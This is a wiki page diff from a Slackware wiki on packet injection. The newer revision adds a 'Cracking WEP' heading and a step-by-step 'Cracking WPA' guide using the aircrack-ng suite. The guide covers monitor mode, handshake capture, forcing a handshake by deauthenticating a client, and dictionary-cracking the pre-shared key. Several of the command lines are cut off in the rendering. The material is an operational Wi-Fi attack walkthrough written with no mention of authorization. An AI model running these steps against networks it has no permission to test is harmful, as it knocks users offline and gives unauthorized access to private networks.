slackware:packet_injection
Differences
This shows you the differences between two versions of the page.
| Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
| slackware:packet_injection [2011/06/21 23:42] – slack | slackware:packet_injection [2019/11/07 17:58] (current) – external edit 127.0.0.1 | ||
|---|---|---|---|
| Line 44: | Line 44: | ||
| make unload | make unload | ||
| </ | </ | ||
| + | |||
| + | ====== Cracking WEP ====== | ||
| Now you should be able to follow the entire [[http:// | Now you should be able to follow the entire [[http:// | ||
| Line 200: | Line 202: | ||
| Probability: | Probability: | ||
| </ | </ | ||
| + | |||
| + | ====== Cracking WPA ====== | ||
| + | |||
| + | ===== 1. Put the Wireless Interface into Monitor Mode ===== | ||
| + | |||
| + | <code bash> | ||
| + | airmon-ng start wlan0 9 | ||
| + | </ | ||
| + | |||
| + | Final number is the channel. | ||
| + | |||
| + | ===== 2. Listen for a Handshake ===== | ||
| + | |||
| + | The handshake is the only interesting and useful part of communication between AP and client. | ||
| + | |||
| + | <code bash> | ||
| + | | ||
| + | </ | ||
| + | |||
| + | Where: | ||
| + | * -c 9 is the channel for the wireless network | ||
| + | * --bssid 00: | ||
| + | * -w psk is the file name prefix for the file which will contain the IVs. | ||
| + | * mon0 is the interface name. | ||
| + | |||
| + | Success looks like this -- notice the "WPA handshake: | ||
| + | |||
| + | <code bash> | ||
| + | CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00: | ||
| + | |||
| + | BSSID PWR RXQ Beacons | ||
| + | |||
| + | 00: | ||
| + | |||
| + | BSSID STATION | ||
| + | |||
| + | 00: | ||
| + | </ | ||
| + | |||
| + | ===== 3. (if necessary) Deauthenticate a client to capture a handshake ===== | ||
| + | |||
| + | You can just wait for a handshake, but if there' | ||
| + | |||
| + | <code bash> | ||
| + | | ||
| + | </ | ||
| + | |||
| + | Where: | ||
| + | * -0 means deauthentication | ||
| + | * 1 is the number of deauths to send (you can send multiple if you wish) | ||
| + | * -a 00: | ||
| + | * -c 00: | ||
| + | * ath0 is the interface name | ||
| + | |||
| + | ===== 4. Crack the pre-shared key ===== | ||
| + | |||
| + | <code bash> | ||
| + | aircrack-ng -w password.lst -b 00: | ||
| + | </ | ||
| + | |||
| + | Where: | ||
| + | * -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory. | ||
| + | * *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files. | ||
| + | |||
slackware/packet_injection.1308699758.txt.gz · Last modified: 2019/11/07 17:58 (external edit)